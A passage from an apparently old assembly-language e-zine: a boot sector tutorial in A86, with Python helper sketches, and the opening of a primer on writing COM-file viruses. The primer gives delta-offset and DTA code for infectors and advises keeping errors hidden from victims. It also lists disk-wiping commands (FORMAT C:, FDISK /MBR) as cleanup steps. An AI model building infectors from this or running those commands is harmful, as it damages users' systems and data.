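    """True if the bytes at code[pos:] fit the pattern."""
    chunk = code[pos:pos + len(pattern)]
    return len(chunk) == len(pattern) and all(
        p is WILD or p == b for p, b in zip(pattern, chunk)
    )


def is_print_string(code, pos=0):
    """True if either ordering of the print-string call starts at pos."""
    return any(matches(p, code, pos) for p in PRINT_STRING_PATTERNS)


ah_first = bytes([0xB4, 0x09, 0xBA, 0x0D, 0x01, 0xCD, 0x21])
dx_first = bytes([0xBA, 0x0D, 0x01, 0xB4, 0x09, 0xCD, 0x21])
ah_set_earlier = bytes([0xBA, 0x0D, 0x01, 0xCD, 0x21])

print(is_print_string(ah_first), is_print_string(dx_first),
      is_print_string(ah_set_earlier))
```

The third sequence is the case the article warns about: AH was loaded somewhere
else, so neither pattern fits and only the individual instructions would show.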

One of the best aspects of Define in my book is that the memory can be viewed
according to a person's level of understanding (or will be as the definitions
are written); for example, the program is able to show only definitions of a
certain level and no other. I have chosen to represent the level of a definition
by its color: I have used blue (1) for the lowest level, which are the
instruction set definitions, then green (2) for the next level, which are the
DOS, BIOS, etc. definitions, then magenta (3) for the next level, which may be
definitions to clear the screen and print the date combined, and so on, so that
a person who knows little about machine code may set the maximum definition
color to red (4) and still be able to write a program using Define. The
advantage for those who know machine code is that they need not be restricted to
only a high level definition: by turning the observance of the color off they
can press the letter B when viewing a high level definition and see the lower
level definitions that make up the higher one. By repeatedly pressing B they can
view the program as level 1 (blue) or even as the byte values themselves.

The most radical departure from most assemblers is that when writing a program
the program is composed in memory: the byte values of the definitions are
written directly to an unused or reserved area of memory where they can be
further altered directly while reading memory. This could also be said to be the
most dangerous method, as it can easily lead to the accidental overwriting of
other areas of memory. While this is true, I have also found a benefit: if
Define is stopped and then restarted, the program being written will still be in
memory without having been saved (depending on where in memory the program is
being written).

The maker of a violin, while demonstrating it, must have said at one time or
another "A good violinist could really show you how to play it". I too, like the
maker of a violin, am sure there are better definition writers than myself. To
become a high level language the high level definitions need to be written, and
I ask any person who has a passion for writing hand written code to send me a
definition or two to include in the definition file.


You can download Define from my homepage at
	 http://members.net-tech.com.au/alaneb/default.htm
and there is a step by step guide to using the program in the zip file, called
manual.doc.

Please send any definitions or response to Alan at alien1_3@...



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                     Writing a Boot Sector in A86
                                                     by Jan Verhoeven


I have been coding for FreeDOS for some time, but that is a C project and I
rather hate C. It is so clumsy. That's also why I always code in A86
assembly language, the "No Red Tape" assembler that makes life a lot
easier for programmers.

A86 is good. The debugger (D86) could be better, but not too much. I
registered my version and I want to encourage everyone to follow my
lead. The software is good enough to pay for it. And it ensures proper
development of the software. If you can spare 20 bucks a month for the
ISP, you should also spend this on quality software.
During the last two years I have been submitting bugs to Isaacson and
all of them have been fixed in the latest version (4.03).

Besides A86 being the best assembler around, it has some idiosyncrasies
that some people need to get used to. Plus my personal preferences,
which might add to that...

  - When I refer to a memory location I use square brackets.
  - I use single quotes for texts
  - I use most of the A86 features.

Some of the A86 features are:

  - very powerful macro language
  - numbers starting with a ZERO are ALWAYS hex, no matter how they end
  - easy IF statements to reduce nonsense labelnames
  - local labels, like below: only two local labels.

I started out on the Z-8000, back in 1981, switched to the Z-80, Z-8,
8086, PIC 16Cxx, some 8051 (Barffff), some 68K (yummie yummie). Mainly
in ASM and else in Modula-2. I have some really cool and useful routines
lying around for DOS. And I'm gonna share them with the world.

The following code is a bootsector which can be used for non-bootable
disks. In this case for a 1.44 Mb floppy disk. You could use it to make
a commercial out of every non-bootable disk.

First the code:

----- Code file -------------------------------------------------
name     flopnb
title    Floppy disk boot sector, non-bootable, 1.44 Mb
page     80, 120

; version 1.0  : It works                               : OK 12-12-1998

lf       = 10
cr       = 13

          org   0

          jmp   short main       ; this is critical!
          nop                    ; and this too!
; ----------------------

OEMname  db    'StupiDOS'
BpS      dw    512              ; bytes per sector
SpA      db    1                ; sectors per allocation unit (=cluster)
ResSect  dw    1                ; reserved sectors, starting from sector 0
NrFats   db    2                ; number of FAT's on this disk
FiR      dw    224              ; number of entries in ROOT directory
Total    dw    2880             ; number of sectors per disk
ToM      db    0F0              ; Type of Media
SpF      dw    9                ; Sectors per Fat
SpT      dw    18               ; sectors per Track
Heads    dw    2                ; number of heads
Hidden   dw    0, 0             ; Hidden sectors
GrandTot dd    0                ; total for disks over 32 Mb
IntId    db    0, 0
BootSign db    029              ; extended boot signature
VolumeID dd    0566E614A        ; serial number ...
DiskLabl db    'DOS is MINE'    ; volume label
FATtype  db    'FAT-12  '       ; FAT type
          db    'VeRsIoN=1.0', 0 ; for version control only
; ----------------------

L1:      push  si               ; stack up return address
          ret                    ; and jump to it

print:   pop   si               ; this is the first character
          mov   bx, 0            ; video page 0
L0:      lodsb                  ; get token
          cmp   al, 0            ; end of string?
          je    L1               ; if so, exit
          mov   ah, 0E           ; else print it
          int   010              ; via TTY mode
          jmp   L0               ; until done
; ----------------------

main:    cld                    ; init direction flag
          cli                    ; take care of 1 faulty batch of 88's in 1980
          mov   ax, 07C0         ; this is the segmentvalue at start
          mov   ds, ax           ; store it in DS, ES
          mov   es, ax
          mov   ax, 0            ; clear ax ...
          mov   ss, ax           ; ... to prime the SS register
          mov   sp, 07C00        ; set stackpointer
          sti                    ; OK, interrupts may come again
          call  print            ; show that message
          db    cr
          db    'This is not a bootable floppy. '
          db    'Please strike any key to reboot.', cr, lf
          db    'This floppy disk is formatted by FreeDOS', cr, lf, lf
          db    'Please visit us at www.freedos.org', cr, lf, 0

L0:      mov   ah, 1            ; wait for keypress by ...
          int   016              ; ...  interrogating keyboard
          jz    L0               ; if no key pressed, loop back
          mov   ax, 0            ; else address system variables
          mov   es, ax           ; in order to ...
       es mov   w [0472], 01234  ; signal: NO POST and go on ...
          jmp   0FFFF:0000       ; with the next reboot

          org   01FE             ; look for the dotted line and ...
          db    055, 0AA         ; ... don't forget to sign!

------------------------------------------------- Code file -----

The first three lines are straightforward: name, title and page. Not
much to tell about that. Then some version info for the programmer, some
equates and the ORG statement.

If no ORG is supplied, A86 will assume it is ORG 0100. I ordered an ORG 0,
which means several things:

  - start assembly at address 0
  - the output file will be called *.BIN

Bootsectors must start with some particular bytes. Therefore the first
three bytes need to be either a short jump (opcode plus a one-byte
offset) followed by a NOP, or a (long) jump with a two-byte offset and
no NOP.

At offset 03 of the bootsector comes the OEM name, followed by the BPB
(BIOS Parameter Block) which tells the OS what kind of disk this is.
Please put ASCII in the OEM name, or virus scanners might trip on it
with a "Bloodhound warning".

After the description of the geometry of this disk, I included an
extended boot signature, since we have ample room left. It contains
Volume ID, Disk Label, and FAT-type strings.
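
To check that the fields in the listing add up, the header can be packed and
read back with a few lines of Python. This is a sketch under assumptions: the
field names are made up for readability, the jump displacement is a placeholder
(the assembler computes the real one), and the layout arithmetic uses the
standard 32-byte FAT directory entry.

```python
import struct

# First 62 bytes of the sector: jump + NOP, OEM name, geometry, extended fields.
BOOT_HEADER = struct.Struct("<3s8sHBHBHHBHHHIIBBBI11s8s")
FIELDS = (
    "jump", "oem", "bytes_per_sector", "sectors_per_cluster",
    "reserved_sectors", "fats", "root_entries", "total_sectors", "media",
    "sectors_per_fat", "sectors_per_track", "heads", "hidden", "grand_total",
    "drive", "reserved", "boot_sign", "volume_id", "label", "fat_type",
)

# Values copied from the listing; 0xEB 0x00 0x90 is a placeholder jump.
header = BOOT_HEADER.pack(
    b"\xEB\x00\x90", b"StupiDOS", 512, 1, 1, 2, 224, 2880, 0xF0, 9, 18, 2,
    0, 0, 0, 0, 0x29, 0x566E614A, b"DOS is MINE", b"FAT-12  ",
)


def layout(sector):
    """Derive where the FATs, root directory and data area start."""
    f = dict(zip(FIELDS, BOOT_HEADER.unpack_from(sector)))
    bps = f["bytes_per_sector"]
    root_dir_sectors = (f["root_entries"] * 32 + bps - 1) // bps
    first_root = f["reserved_sectors"] + f["fats"] * f["sectors_per_fat"]
    first_data = first_root + root_dir_sectors
    return {
        "first_fat_sector": f["reserved_sectors"],
        "first_root_sector": first_root,
        "root_dir_sectors": root_dir_sectors,
        "first_data_sector": first_data,
        "data_clusters": (f["total_sectors"] - first_data)
        // f["sectors_per_cluster"],
    }


print(BOOT_HEADER.size, layout(header))
```

For the 1.44 MB values in the listing the two FATs occupy sectors 1 to 18, the
root directory takes the next 14 sectors, and data starts at sector 33.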

The PRINT subroutine is a nice one. It will print the ASCIIZ string that
follows it. This is quite a handy routine since you can simply change
messages without having to worry about the address and length of the
actual message.

Print is called like this:

         call   print
         db     'Hello World', cr, lf, 0
         ...

Print takes the "return address" off the stack. This of course is no
return address but the address of the message. What follows is easy:

  - get next character
  - IF  (non-zero)  print character  ELSE  leave loop  ENDIF
  - the current si pointer is the actual return address... So we push it
  - and return to caller.

Perhaps a jmp  si could be possible too, but I like clear code, in most
cases. If you need obfuscated code, switch to C. :)
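
The trick behind PRINT, treating the pushed return address as a pointer to the
text and then resuming just past the terminating zero, can be modelled in
Python. The function name and the byte string standing in for the code segment
are assumptions for illustration; the bytes before and after the message are
dummies.

```python
def call_print(code, return_address):
    """Model of PRINT: returns (text printed, address execution resumes at)."""
    si = return_address              # pop si
    out = bytearray()
    while True:
        al = code[si]                # lodsb: load the byte ...
        si += 1                      # ... and advance SI
        if al == 0:                  # cmp al, 0 / je L1
            break
        out.append(al)               # int 010, function 0E
    return out.decode("ascii"), si   # push si / ret


# Three dummy bytes stand in for the CALL; 0x90 marks the next instruction.
code = b"\xE8\x00\x00" + b"Hello World\r\n\x00" + b"\x90"
text, resume = call_print(code, 3)
print(repr(text), resume, hex(code[resume]))
```

Since LODSB has already stepped past the zero byte when the loop exits, SI is
exactly the address of the instruction following the message.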

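The actual program is very simple. It just sets up a stack and the
segment registers, and then prints that it will do nothing. Gee, what a
life... Note that PRINT reads the message through DS:SI using the offset
that CALL pushed, so with DS set to 07C0 the code counts on the BIOS
entering the sector at 07C0:0000; a BIOS that enters at 0000:7C00 pushes
offsets that are 07C00 too high for this DS.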

After the message we wait for a key and then:

  - signal a fast reboot by storing 01234 in the word at 0000:0472
  - jump to the reboot vector at 0FFFF:0000

Whatever there will be between end of code and offset 01FE is not
relevant (it could be your ad) but the last two bytes of the boot sector
must be a valid boot signature.
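
What ORG 01FE and the final DB do can also be done after the fact on a raw
binary. The Python helper below is a hypothetical sketch: it pads whatever code
it is given up to offset 01FE and appends the signature bytes 055, 0AA.

```python
SECTOR_SIZE = 512
SIGNATURE = b"\x55\xAA"


def finish_sector(code, filler=0):
    """Pad code to offset 0x1FE and append the boot signature."""
    room = SECTOR_SIZE - len(SIGNATURE)          # 510 = 0x1FE
    if len(code) > room:
        raise ValueError("code does not fit in front of the signature")
    return code + bytes([filler]) * (room - len(code)) + SIGNATURE


def has_boot_signature(sector):
    """True if the sector is 512 bytes long and ends in 55 AA."""
    return len(sector) == SECTOR_SIZE and sector[0x1FE:] == SIGNATURE


sector = finish_sector(b"\xEB\xFE")              # dummy two-byte program
print(len(sector), has_boot_signature(sector))
```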

That's it. With this code you can make your own custom non-bootsector.

I hope this software has also shown that linking and assuming are
supported by A86, but certainly not necessary. Also, this software does
not rely on any HLL calls. It's just assembly language as it should be.

I want to remark that this software is Open Source, according to the rules
of the GNU GPL. Make sure you understand these rules before embedding this
routine in your own software.



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                    A Basic Virus Writing Primer
                                                    by Chili


What horror  must the ignorant victim  undergo as it  becomes aware  of a being
that lives inside its own body, growing ever stronger, reproducing itself until
its host, unable to bear more, finally collapses and dies a horrible death. What
panic  it must  feel,  knowing nothing  can be  done  in time  to avoid  such a
terrible fate.  A predator so tiny that it spreads unsuspected from one host to
another,  thereby  rapidly  infecting  millions.  An  organism,  so  utterly
resourceful and small, that it stays most of the time undetectable, breeding in
the shadows.

Computer viruses aren't much  different from their biological counterpart,  but
instead of infecting cells they infect files and boot sectors.  In this article
I'll try to explain the basics of file viruses,  more specifically runtime (aka
direct  action)  COM  infectors.   This  will  cover  most  simple  search  and
replication  methods used and  is only to be  considered as an  introduction to
virus writing.  After some thought I've decided not  to include any full source
code  for a  working virus,  since anyone  with  half  a brain  and a  somewhat
mediocre  knowledge of assembly can  easily build a virus out  of the pieces of
code  that will  be presented.  Furthermore  it's not  my wish to  increase the
number of viruses in the wild, something that would undoubtedly happen at the hands
of some I-have-no-brain-and-can't-program-hellspawn bent on random destruction.
Anyway, on with the article...


Some Sort Of 'Programming Virii Safely' Guide
---------------------------------------------
The only really safe way to program viruses is to know what you're doing and
understand at all times how the virus is behaving. If you test a virus on your
own machine without fully comprehending its ins and outs, then you will most
likely have your system trashed. It would be best if you had a second computer
just for this purpose, since buggy programming can lead to a lot of crashes
and general havoc. If not, a Ramdrive can be created and a Subst can be done,
so that all accesses to physical drives are redirected to the virtual one.
Assuming that you want your Ramdrive to have 512-byte sectors, a limit of 1024
entries and to allocate 2048K of extended memory, you must add this line to your
CONFIG.SYS:

DEVICE=C:\DOS\RAMDRIVE.SYS 2048 512 1024 /E

Then you must copy COMMAND.COM  and SUBST.EXE to the Ramdrive so that DOS won't
hang and also in order for you to be able to delete all redirections when done.
And to associate all  physical drives to the newly  created virtual drive  (and
assuming that it is D: and all your drives are A: and C:) you should do:

SUBST A: D:\
SUBST C: D:\

Of course this last method isn't perfect. You should always know how to
completely remove a virus before running it, or you'll end up cleaning up the
mess for quite some time.

Just use  common sense.  For example,  if  you're  writing a  virus aimed  at a
specific file type,  all you have  to do is copy all files of that  type you do
not wish to  be infected to a different extension and when  you're done testing
just  switch those files  back to their original extension.  While testing  you
should  also place breakpoints  and warning  messages throughout  the code,  so
that you know at all times what the virus is doing, which will also help you in
debugging it. Also you should program and test different routines separately as
it will reduce complexity and bug proneness.  Lastly the use of memory and disk
mapping/editing utilities,  a set of good anti-virus and most important the use
of backups is encouraged, so that you can keep track  of things and are able to
restore your system in case something goes wrong.

In case things  get really out of hand  you should always  have a clean "rescue
disk" which you should  create by doing a FORMAT A: /S /U and then copying into
it some  useful DOS files  like FORMAT.COM,  UNFORMAT.COM, FDISK.EXE,  SYS.COM,
MEM.EXE,  ATTRIB.EXE, DEBUG.EXE,  CHKDSK.EXE, SUBST.EXE,  a text editor just in
case and whichever other  files you may find useful.  Also an anti-virus should
be included along.  Don't forget to write protect the disk and put it in a safe
place.  The first thing  you should  do in order to clean  up your system is to
boot from your previously created disk and use your anti-virus's cleaning and
restoration features, as most times this will work, saving you a lot of hassle.
As a last resort, you should run FDISK /MBR to re-write the executable code and
error messages of the partition sector, then run FDISK and first delete, then
create a new partition table and finally run FORMAT C: /S /U.  Your system should
now be  completely clean and you can restore your backups at this time.  If all
you want is to clean a floppy disk instead of a hard disk, then all you have to
do is run FORMAT A: /S /U to create a new boot sector,  FAT and root directory.
Of course, after these procedures all data will be lost, so as I said before
this should only be used if you're really desperate.

Above all, don't forget to backup, backup, backup!


Tools & References
------------------
In order to write and test a successful virus you need some useful programs and
references, such as:

- An assembler (TASM, MASM, Intel's ASM86, A86, NASM, ...) -  I recommend using
   Turbo Assembler, as all code I will provide will be tested with it.
- A linker (TLINK, LINK, Intel's LINK86...) - Again I recommend Turbo Linker.
- A debugger (Dos' DEBUG, TD, ...) - Dos' DEBUG is old but will do the job, you
   can use Turbo Debugger though, as it is somewhat better.
- A text and a hex editor of your choice.
- A disassembler (DEBUG, Sourcer, IDA, ...) - You can use Dos' DEBUG, but would
   be better  if you used Sourcer which is very  good or IDA which  is excellent
   but very large in size.
- Some other things like TSR Utilities by TurboPower Software, Norton Utilities
   and more.
- A good set of Anti-Virus packages, such as ThunderBYTE Anti-Virus (it has a great
   set of utilities  to backup your bootsector,  partition table and CMOS),  AVP
   (AntiViral Toolkit Pro) and F-PROT.  Also available are  McAfee (now  Network
   Associates, I think) VirusScan, Dr.Solomon's AVTK and Norton Anti-Virus.
- Ralf Brown's  x86/MSDOS Interrupt  List,  Norton Guides'  Assembly  Language
   database, David Jurgens' HelpPC, DOSREF (Programmers' Technical Reference for
   MSDOS and the IBM PC) and others you find useful.


On Viruses
----------
There are two things that must always be present in every working virus: first
the search routine that seeks suitable targets for the virus to infect, and
second the replication routine that copies the virus to the found target. Other
routines may also be added in order to enhance the virus, and the two more basic
and essential parts can be improved, increasing its performance, albeit its
complexity too.

I intentionally left out a major routine, the payload (aka activation routine),
though not necessary, it is present in almost all viruses.  Sincerely I see  no
real use for  most activation routines,  since all they do is seriously cripple
the virus's chance to spread. Besides, all good payloads must be custom made (as
should all viruses,  but that's another story...), so you'll have to build your
own if  you want one.  For some old  good examples of  non-destructive payloads
take a look at Ambulance Car, Cascade, Den Zuk, Corporate Life and Crucifixion.

All code presented hereafter was first tested on both of my machines and works,
but this  doesn't mean that it will work on  all possible configurations,  so I
can't fully guarantee that it won't ever cause unwanted damage. It's bad enough
that  your virus  may unwillingly  trash someone's  data,  so don't go  writing
destructive payloads just for the hell of it. Programming - and therefore virus
writing - is an art, treat it as such.


A Word On Error Trapping
------------------------
Error trapping is regrettably one of the most forgotten things in viruses.  You
should always  account for errors in order not to  crash and even trash things.
This doesn't mean that you should present cute DOS-like error messages, as this
would  alert the  user,  instead you  should  process  the information  and act
accordingly. That most times just means that you should abort the virus ongoing
operations and restore control back to the host.


Optimization
------------
All code will be presented in an unoptimized form for ease of understanding and
also because all routines are shown  separate from each other so  that they are
portable to  different kinds of viruses.  When writing a full virus  you should
always optimize your code, so that it takes as little space as possible.  Don't
use procedures unless you can save space by doing so.  Also don't use variables
when you can use registers (for example the F_Handle variable needs not be used
since you could just use the stack or some free register - see below).


Delta Offset
------------
When you're programming a virus that will always be placed at a fixed location,
like overwriting  and prepending viruses,  you won't have to worry about any of
this, but if you're writing a virus that relocates part of its code to a random
location,  such as appending and midfile infectors,  you'll have to account for
the  displacement.  This doesn't affect most  jumps and calls,  since they  are
relative, but data on the other hand is referred to by an absolute offset. Things
would work fine the first  time you assembled and ran the virus,  but not after
the first infection when all memory addresses would then be changed.

To account for this all one has to do is:

--8<---------------------------------------------------------------------------
Delta_Offset:
         call    Find_Displacement
Find_Displacement:
         pop     bp
         sub     bp, offset Find_Displacement
---------------------------------------------------------------------------8<--

What this piece of code does is, first issue a CALL to the next instruction, so
the IP (Instruction Pointer) for it will be pushed onto the stack, next we POP it
to the  register BP  (it is good programming  to use BP,  which stands for Base
Pointer), and finally we SUBtract the original OFFSET determined when the virus
was compiled.  Of course the first time the virus is run, the displacement will
be zero, only on subsequent runs will it change according to the host size.

I'll be presenting code for infectors that require delta offset calculation, so
for all the other infectors that don't, in order to accommodate any of the code
presented hereafter you'll just have to strip out any displacement calculations
as in the following examples:

Replace
         lea     dx, [bp+offset DTA]
With
         lea     dx, DTA

Replace
         mov     word ptr [bp+F_Handle], ax
With
         mov     F_Handle, ax

Once you've given it a little thought and figured it out, it's not as hard as
it may first seem.  Of course,  even if you're  programming a  fixed location
virus you can still leave all the code as if you were writing one that needed
to calculate the delta offset,  since the displacement would always be  zero.
Nevertheless you shouldn't do this, mainly because it adds unnecessary size to
the virus and it is extremely sloppy (and lazy) programming (copying?!?!).


.COM File Structure
-------------------
COM files are raw binary executables,  designed for compatibility  with the old
CP/M operating system.  Whenever a COM file is executed, DOS first sets aside a
segment (64K) of memory for it,  then builds a PSP  (Program Segment Prefix) in
the first 256 bytes, after which the program image is loaded, starting at offset
100h.  Before passing control to the program DOS sets up a few things,  among
which are:

    1) Register AX  reflects the validity  of drive specifiers  entered with the
       first two parameters as follows:
         AL=0FFh if the  first parameter  contained an invalid drive  specifier,
                 otherwise AL=00h
         AH=0FFh if the second  parameter contained an invalid  drive specifier,
                 otherwise AH=00h

    2) All four segment registers contain the segment address of the PSP control
       block

    3) The Instruction Pointer (IP) is set to 100h

    4) The SP register is set to the  end of the program's segment and a word of
       zeroes is placed on top of the stack

If any of these things are changed during the virus execution, don't forget to
restore them before passing control back to the host.

So, given this, a COM file program can only have a maximum size of 65278 bytes
(65536 - 256 - 2),  since you have to account for the PSP and at least for the
two bytes occupied by the stack.  Here is how a COM file looks when loaded  in
memory:

    FFFFh +--------------------+ <- SP
          |                    |
          |       Stack        |
          |                    |
          +--------------------+
          |                    |
          | Uninitialized Data |
          |                    |
          +--------------------+
          |                    |
          |   COM File Image   |
          |                    |
     100h +--------------------+ <- IP
          |                    |
          |        PSP         |
          |                    |
       0h +--------------------+ <- CS, DS, ES, SS

Don't forget to account for  stack growth needed by your program as well as any
uninitialized data, for if you don't there is a chance that it will crash, since
the stack  may grow large  enough to overwrite  data or code,  or your data may
wrap around and overwrite the PSP and the code.


Program Segment Prefix (PSP)
----------------------------
A PSP is created  by DOS for all programs and contains  most of the information
one needs to know about them. Its structure looks like this:

    [ PSP - Program Segment Prefix ]

    Offset       Size            Description
    ------       ----            -----------
    0h           Word            INT 20h instruction
    2h           Word            Segment address of top of the current program's
                                 allocated memory
    4h           Byte            Reserved
    5h           Byte            Far call to DOS function dispatcher (INT 21h)
    6h           Word            Available bytes in the segment for .COM files
    8h           Word            Reserved
    Ah           Dword           INT 22h termination address
    Eh           Dword           INT 23h Ctrl-Break handler address
    12h          Dword           DOS 1.1+ INT 24h critical error handler address
    16h          Word            Segment of parent PSP
    18h       20 Bytes           DOS 2+ Job File Table (one byte per file handle
                                 FFh = available/closed)
    2Ch          Word            DOS 2+ segment address of  process' environment
                                 block
    2Eh          Dword           DOS 2+ process' SS:SP  on entry to last INT 21h
                                 function call
    32h          Word            DOS 3+ number of entries in JFT
    34h          Dword           DOS 3+ pointer to JFT
    38h          Dword           DOS 3+ pointer to previous PSP
    3Ch       20 Bytes           Reserved
    50h        3 Bytes           DOS 2+ INT 21h/RETF instructions
    53h        9 Bytes           Unused
    5Ch       16 Bytes           Default unopened File Control Block 1 (FCB1)
    6Ch       16 Bytes           Default unopened File Control Block 2 (FCB2)
    7Ch        4 Bytes           Unused
    80h          Byte            Command line length in bytes
    81h      127 Bytes           Command line (ends with a Carriage Return 0Dh)

Note:  For a more  detailed explanation  of the  PSP structure,  including many
undocumented features, see Ralf Brown's x86/MSDOS Interrupt List.
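
As an aside, the last two rows of the table are easy to check away from DOS.
The sketch below is plain Python, not part of the article's assembly, and works
on a 256-byte dump of a PSP; the function name command_tail and the fake PSP it
builds are made up for illustration only.

```python
def command_tail(psp: bytes) -> str:
    """Return the command tail stored in a 256-byte PSP image."""
    if len(psp) < 0x100:
        raise ValueError("a PSP image is 256 bytes long")
    length = psp[0x80]                  # byte at 80h: command line length
    tail = psp[0x81:0x81 + length]      # text starts at 81h, CR not counted
    return tail.decode("ascii", errors="replace")


# Build a fake PSP (all zeroes) whose command tail is " /A FOO.TXT" + CR.
fake_psp = bytearray(0x100)
text = b" /A FOO.TXT"
fake_psp[0x80] = len(text)
fake_psp[0x81:0x81 + len(text) + 1] = text + b"\r"

print(repr(command_tail(bytes(fake_psp))))
```

Note that the length byte does not count the terminating Carriage Return, which
is why the slice stops just short of it.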

And here are the default file handles for the Job File Table (JFT):

    [ DOS Default/Predefined File Handles ]

    0 - Standard Input Device, can be redirected (STDIN)
    1 - Standard Output Device, can be redirected (STDOUT)
    2 - Standard Error Device, can be redirected (STDERR)
    3 - Standard Auxiliary Device (STDAUX)
    4 - Standard Printer Device (STDPRN)

The  File Control Block  (FCB)  and the  Environment Block  structures will  be
covered in a later article, as they aren't needed for now.


Disk Transfer Area (DTA)
------------------------
For all  file reads and writes  performed using FCB function calls,  as well as
for "Find First" and "Find Next" calls (using FCBs or not),  DOS uses a  memory
buffer called the Disk Transfer Area.  By default it is located at  offset  80h
in the PSP and is 128 bytes long.  Since this area is also used by the command
tail, the Disk Transfer Address should be set to a different location in memory
so as not to overwrite whichever command line parameters there might be.   This
is done like this:

--8<---------------------------------------------------------------------------
Set_DTA:
         mov     ah, 1Ah
         lea     dx, [bp+offset DTA]
         int     21h
---------------------------------------------------------------------------8<--

;Interrupt:     21h
;Function:      1Ah     - Set Disk Transfer Address (DTA)
;On entry:      AH      - 1Ah
;               DS:DX   - Address of DTA
;Returns:       Nothing

Of course, before passing control back to the host you should restore the Disk
Transfer Address to its original value:

--8<---------------------------------------------------------------------------
Restore_DTA:
         mov     ah, 1Ah
         mov     dx, 80h
         int     21h
---------------------------------------------------------------------------8<--

A sufficient  buffer area  should always  be reserved,  as DOS will  detect and
abort any disk transfers that would  fall off the end of the current segment or
wrap around within the segment.


FindFirst Data Block
--------------------
Upon a  successful "Find First Matching File"  function call the  Disk Transfer
Area is filled with a FindFirst Data Block, which contains info on the matching
file found.  After each "Find Next Matching File" function call that  data  is
updated.   As we'll only be using the DTA for this,  all we need to do  when
setting a new one is to reserve a 43-byte buffer to hold the FindFirst  Data
Block:

--8<---------------------------------------------------------------------------
DTA:
    Reserv       db      21      dup     (?)
    F_Attr       db      (?)
    F_Time       dw      (?)
    F_Date       dw      (?)
    F_Size       dd      (?)
    F_Name       db      13      dup     (?)
---------------------------------------------------------------------------8<--

And here is the FindFirst Data Block structure:

    [ FindFirst Data Block ]

    Offset       Size            Description
    ------       ----            -----------
    0h        21 Bytes           Reserved  for DOS  use on subsequent  Find Next
                                 calls - is different per DOS version
    15h          Byte            Attribute of matching file
    16h          Word            File time stamp
    18h          Word            File date stamp
    1Ah          Dword           File size in bytes
    1Eh       13 Bytes           ASCIIZ filename and extension
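
The layout above can be sanity-checked away from DOS.  The following is only a
sketch in Python, assuming you have the 43 raw bytes of a FindFirst Data Block
at hand (for instance from a memory dump);  the names FindData, LAYOUT and
parse_find_data are made up for this example, and the sample block is packed by
hand rather than produced by DOS.

```python
import struct
from typing import NamedTuple


class FindData(NamedTuple):
    attr: int   # offset 15h, byte
    time: int   # offset 16h, word
    date: int   # offset 18h, word
    size: int   # offset 1Ah, dword
    name: str   # offset 1Eh, ASCIIZ, up to 13 bytes


# Little-endian, no padding: 21 reserved bytes, byte, word, word, dword, 13 bytes.
LAYOUT = struct.Struct("<21sBHHI13s")


def parse_find_data(block: bytes) -> FindData:
    """Decode the first 43 bytes of a buffer as a FindFirst Data Block."""
    _reserved, attr, time, date, size, raw = LAYOUT.unpack(block[:LAYOUT.size])
    name = raw.split(b"\0", 1)[0].decode("ascii", errors="replace")
    return FindData(attr, time, date, size, name)


# Hand-made sample block; struct pads the short byte strings with zeroes.
sample = LAYOUT.pack(b"", 0x20, 0x6000, 0x2B1F, 1234, b"HELLO.COM")
entry = parse_find_data(sample)
print(LAYOUT.size, entry.name, entry.size)
```

The "<" in the format string matters:  it selects little-endian byte order and
switches off alignment padding, so the computed size is exactly 43 bytes.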

The file attribute field looks like this:

    [File Attribute]

    Bit(s)                       Description
    ------                       -----------
    7 6 5 4 3 2 1 0
    . . . . . . . 1              Read-only
    . . . . . . 1 .              Hidden
    . . . . . 1 . .              System
    . . . . 1 . . .              Volume label
    . . . 1 . . . .              Directory
    . . 1 . . . . .              Archive
    x x . . . . . .              Unused
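
To make the bit layout concrete, here is a small Python sketch that turns an
attribute byte into readable names.  The table ATTRIBUTE_BITS and the function
attribute_names are illustrative names only; the masks are simply the bit
positions listed above.

```python
from typing import List

# (mask, name) pairs, one per bit of the attribute byte described above.
ATTRIBUTE_BITS = [
    (0x01, "read-only"),
    (0x02, "hidden"),
    (0x04, "system"),
    (0x08, "volume label"),
    (0x10, "directory"),
    (0x20, "archive"),
]


def attribute_names(attr: int) -> List[str]:
    """List the names of all attribute bits set in attr (bits 6-7 ignored)."""
    return [name for mask, name in ATTRIBUTE_BITS if attr & mask]


print(attribute_names(0x21))
print(attribute_names(0x00))
```

An attribute byte of zero yields an empty list, which corresponds to a normal
file.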

The file time field is like this:

    [File Time]

    Bit(s)                               Description
    ------                               -----------
    F E D C B A 9 8 7 6 5 4 3 2 1 0
    . . . . . . . . . . . x x x x x      Seconds/2 (0..29) - 2 second increments
    . . . . . x x x x x x . . . . .      Minutes (0..59)
    x x x x x . . . . . . . . . . .      Hours (0..23)
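
The packing is nothing more than shifts and masks.  A minimal Python sketch,
with the function names decode_dos_time and encode_dos_time chosen just for
this example:

```python
def decode_dos_time(value: int):
    """Split a 16-bit DOS time stamp into (hours, minutes, seconds)."""
    hours = (value >> 11) & 0x1F       # bits F..B
    minutes = (value >> 5) & 0x3F      # bits A..5
    seconds = (value & 0x1F) * 2       # bits 4..0 hold seconds / 2
    return hours, minutes, seconds


def encode_dos_time(hours: int, minutes: int, seconds: int) -> int:
    """Pack a time of day into a 16-bit DOS time stamp."""
    return (hours << 11) | (minutes << 5) | (seconds // 2)


stamp = encode_dos_time(12, 34, 56)
print(decode_dos_time(stamp))
```

Because only seconds/2 is stored, an odd number of seconds is rounded down to
the even second below it when the stamp is decoded again.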

And finally the file date field like this:

    [File Date]

    Bit(s)                               Description
    ------                               -----------
    F E D C B A 9 8 7 6 5 4 3 2 1 0
    . . . . . . . . . . . x x x x x      Day (1..31)
    . . . . . . . x x x x . . . . .      Month (1..12)
    x x x x x x x . . . . . . . . .      Year since 1980 (0..119)
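
The date word unpacks the same way.  Again this is only a Python sketch, and
decode_dos_date and encode_dos_date are names invented for the example:

```python
def decode_dos_date(value: int):
    """Split a 16-bit DOS date stamp into (year, month, day)."""
    year = 1980 + ((value >> 9) & 0x7F)   # bits F..9: years since 1980
    month = (value >> 5) & 0x0F           # bits 8..5
    day = value & 0x1F                    # bits 4..0
    return year, month, day


def encode_dos_date(year: int, month: int, day: int) -> int:
    """Pack a calendar date (1980 or later) into a 16-bit DOS date stamp."""
    return ((year - 1980) << 9) | (month << 5) | day


stamp = encode_dos_date(2001, 8, 31)
print(hex(stamp), decode_dos_date(stamp))
```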


Current Directory Preservation
------------------------------
If you're searching  for files outside the  directory where your virus  was run
